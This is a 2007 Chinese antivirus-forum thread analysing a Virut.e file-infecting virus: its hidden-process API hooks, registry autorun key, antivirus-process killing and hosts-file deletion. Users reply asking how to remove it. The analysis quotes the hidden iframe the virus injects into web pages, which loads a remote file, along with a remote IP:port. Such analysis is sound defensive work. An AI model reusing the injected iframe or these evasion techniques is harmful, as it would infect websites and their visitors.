newcenturymoon - 2007-4-9 23:02:00
今天从某个网友那里获得了一个病毒 据说是感染文件的 卡巴报为Virus.Win32.Virut.e(瑞星还不能查杀)
看病毒名估计是一个新的感染exe系列的变种
病毒文件名 VT100.exe
病毒大小 125952字节
MD5 35703ea7c752d959d2e9d904654a5522
编写语言 Delphi
此病毒特征:1.感染exe(包括系统分区)html htm php asp aspx 文件
2.结束一些杀毒软件进程
3.删除hosts文件
4.通过hook API函数 隐藏进程 隐藏文件自身及注册表中的启动项目
5.删除gho文件
总体上来看有点步李俊的后尘哦!
运行文件后
生成如下文件
C:\Windows\system32\VT100.exe
Hook 以下API函数Ntcreatefile
Ntcreateprocess
NtcreateprocessEx
NtEnumerateValueKey
NtQueryDirectoryFile
NtQuerySystemInformation
ZwCreateFile
ZwCreateprocess
ZwCreateprocessEx
ZwEnumerateValueKey
ZwOpenFile
ZwQueryDirectoryFile
使得C:\Windows\system32\VT100.exe在资源管理器下不可见
其进程在任务管理器中也不可见
后面提到的启动项目 在注册表编辑器中也不可见
注册表方面
添加HKLM\SOFTWARE\Microsoft\Tracing\FWCFG键
并在其下建立值
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize: 0x00100000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory: "%windir%\tracing"
用意不懂 不过感觉应该和不断的停止防火墙的程序有关
我的瑞星防火墙就是被他不断的停止...
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面增加名称为VT100 Emulator的键值
指向 C:\Windows\system32\VT100.exe达到开机自启动的目的
删除C:\WINDOWS\system32\drivers\etc\hosts
和gho文件
如果有如下进程则结束
sfmantec antipirus(作者拼错了吧?呵呵)
ravmon.exe
zonealarm
rav_onclass
感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的exe文件
使得被感染文件增加9728字节的内容
感染感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的html htm php asp aspx 文件
在其内部添加如下代码
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
通过winlogon进程访问81.95.149.98:65520 可没找到插入winlogon的 dll ..
三月学毒 - 2007-4-9 23:34:00
今天看到很多的人问,但是我没的样本,也不知道怎么办,现在明白了,谢谢楼主
阿拉就是范尼 - 2007-4-10 11:49:00
这个病毒怎么对付啊?
LZ帮忙!!!!!
newcenturymoon - 2007-4-11 13:37:00
手工能做到的只是删除病毒主体和其启动项目 感染的文件由于数量太多手工无法修复 只能依靠杀毒软件
三月学毒 - 2007-4-11 14:43:00
不错啊,我找了很就了,但是有许多不懂的地方,比如HOOK是干什么的
我是来来 - 2007-4-14 16:02:00
Ding
不帅是你不知道 - 2007-4-14 16:47:00
不懂啊
天月来了 - 2007-4-14 18:13:00
唉!!!!!!!
一个字------------------
唉!!!!!!!!!!!!!
© 2000 - 2026 Rising Corp. Ltd.